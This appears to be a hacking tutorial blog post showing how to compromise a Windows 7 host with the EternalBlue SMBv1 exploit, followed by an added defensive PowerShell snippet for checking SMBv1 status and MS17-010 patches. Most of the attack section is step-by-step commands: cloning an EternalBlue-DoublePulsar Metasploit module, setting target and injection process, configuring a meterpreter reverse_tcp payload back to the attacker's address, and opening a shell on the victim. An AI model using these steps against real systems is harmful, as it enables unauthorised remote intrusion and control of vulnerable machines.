Hacking Windows Server using EternalBlue Exploit
EternalBlue is an exploit developed and used by the National Security Agency (NSA). It was leaked by the hacker group known as the Shadow Brokers in April 2017, and the leaked exploit was then used in the worldwide WannaCry ransomware attack and in the NotPetya ransomware, both of which had devastating effects. The exploit targets a vulnerability in the Windows Server Message Block 1.0 (SMBv1) server. SMB is the protocol Windows machines on the same network use to share files. In this vulnerability, the SMBv1 server was unable to handle specially crafted packets, which resulted in remote code execution. The vulnerability is registered as CVE-2017-0144.
So let's start with our demo.
Our Victim: Windows 7 (IP address: 192.168.0.103)
Our Attacker: Kali (IP address: 192.168.0.105)
Before starting, make sure you have wine installed in your Kali. If not, type the following commands in your Kali (wine is used to run exe files, i.e. Windows applications, on other operating systems):
dpkg --add-architecture i386
apt-get install wine32
Next, we need to download the exploit and place it in our Metasploit module directory.
We can get the exploit from the following link: https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
Go to your terminal and type:
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
Now go to the folder where the exploit has been downloaded.
Copy the Eternalblue-Doublepulsar.rb file and place it under the following directory: /usr/share/metasploit-framework/modules/exploits/windows/smb/
Now that everything is set up, start your Metasploit framework by typing msfconsole
Now search for the eternalblue exploit.
Now type the following to use our doublepulsar exploit:
Then type: show options
This lists all the options that we are required to fill in.
Next we need to set our remote (target) host and the process we want to migrate into, so type the following commands:
set RHOST 192.168.0.103
set PROCESSINJECT explorer.exe
Now we need a payload that gives us a reverse connection in our meterpreter:
set PAYLOAD windows/x64/meterpreter/reverse_tcp
Set the host that will listen for the reverse connection (the attacker's IP address):
set LHOST 192.168.0.105
Now that everything is set up, just type exploit and you are ready to go.
Thus we get our meterpreter session. Now just type shell to get the command prompt of the victim machine.
NOTE: There is also a module in Metasploit to check whether the victim's machine is vulnerable to this exploit. You can run this check first and then use the exploit as explained above. The module is auxiliary/scanner/smb/smb_ms17_010; set your target host and initiate the scan.
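The same question can be answered from the defender's side of the box. The following PowerShell snippet is an added example, not part of the original post or of the Metasploit project: run from an elevated prompt on a Windows 7 / Server 2008 R2 host, it reports whether the SMBv1 server is enabled (the registry value Microsoft documents for SMB1, which is absent by default and therefore enabled), offers Microsoft's documented mitigation of setting that value to 0, and looks for the March 2017 Windows 7 updates that shipped the MS17-010 fix. The function names and the list of KBs to look for are this example's own choices.

```powershell
# Added example (not from the original post): check SMBv1 state and MS17-010 patch
# presence on a Windows 7 / Server 2008 R2 host. Assumes an elevated PowerShell prompt.
$lanmanParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Get-Smb1State {
    # On Windows 7 the SMB1 value is absent by default, and absent means ENABLED.
    $value = (Get-ItemProperty -Path $lanmanParams -Name SMB1 -ErrorAction SilentlyContinue).SMB1
    if ($null -eq $value -or $value -ne 0) { 'Enabled' } else { 'Disabled' }
}

function Disable-Smb1 {
    # Microsoft's documented mitigation for Windows 7: set SMB1 = 0, then reboot.
    Set-ItemProperty -Path $lanmanParams -Name SMB1 -Type DWORD -Value 0 -Force
}

function Get-Ms17010Updates {
    # March 2017 Windows 7 updates carrying the MS17-010 fix: KB4012212 (security-only)
    # and KB4012215 (monthly rollup). Later cumulative rollups supersede them, so an
    # empty result means "check update history", not proof that the host is exposed.
    $ms17010Kbs = 'KB4012212', 'KB4012215'
    Get-HotFix | Where-Object { $ms17010Kbs -contains $_.HotFixID } |
        Select-Object -ExpandProperty HotFixID
}

"SMBv1 server: $(Get-Smb1State)"
$found = Get-Ms17010Updates
if ($found) { "MS17-010 update present: $($found -join ', ')" }
else { "No March 2017 MS17-010 KB found; verify in update history (later rollups supersede it)" }
```

Call Disable-Smb1 only after confirming nothing on the network still depends on SMBv1, and reboot afterwards for the registry change to take effect; the auxiliary scanner from the note above is then a useful cross-check from the network side.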
So that's it for now. See you next time. Goodbye.